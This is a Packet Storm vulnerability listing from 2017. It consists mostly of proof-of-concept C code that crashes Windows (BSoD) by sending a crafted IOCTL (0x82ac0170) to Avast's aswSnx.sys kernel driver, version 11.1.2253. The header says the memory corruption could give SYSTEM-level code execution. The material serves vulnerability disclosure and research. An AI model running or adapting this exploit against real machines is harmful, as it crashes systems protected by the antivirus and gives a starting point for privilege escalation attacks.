Avast aswSnx.sys Kernel Driver 11.1.2253 Memory Corruption

2017-06-16T00:00:00
ID PACKETSTORM:142973
Type packetstorm
Reporter bee13oy
Modified 2017-06-16T00:00:00

Description

                                        
                                            `/**  
* Author: bee13oy  
* BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)  
* Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)  
*  
* There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl   
* number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the   
* context of SYSTEM.  
**/  
  
#include <Windows.h>  
  
void BSoD(const char* szDeviceName)  
{  
HANDLE hDevice = CreateFileA(szDeviceName,  
GENERIC_READ,   
0,   
NULL,   
OPEN_EXISTING,   
0,   
NULL);  
  
if (hDevice != INVALID_HANDLE_VALUE)  
{  
DWORD nbBytes = 0;  
CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a";   
CHAR bufOuput[0x8+1] = "";   
DeviceIoControl(hDevice,   
0x82ac0170,   
bufInput,   
0x00000008,   
bufOuput,   
0x00000008,   
&nbBytes,   
NULL  
);   
}  
}  
  
int _tmain(int argc, _TCHAR* argv[])  
{  
BSoD("\\\\.\\aswSnx");  
  
return 0;  
}  
  
`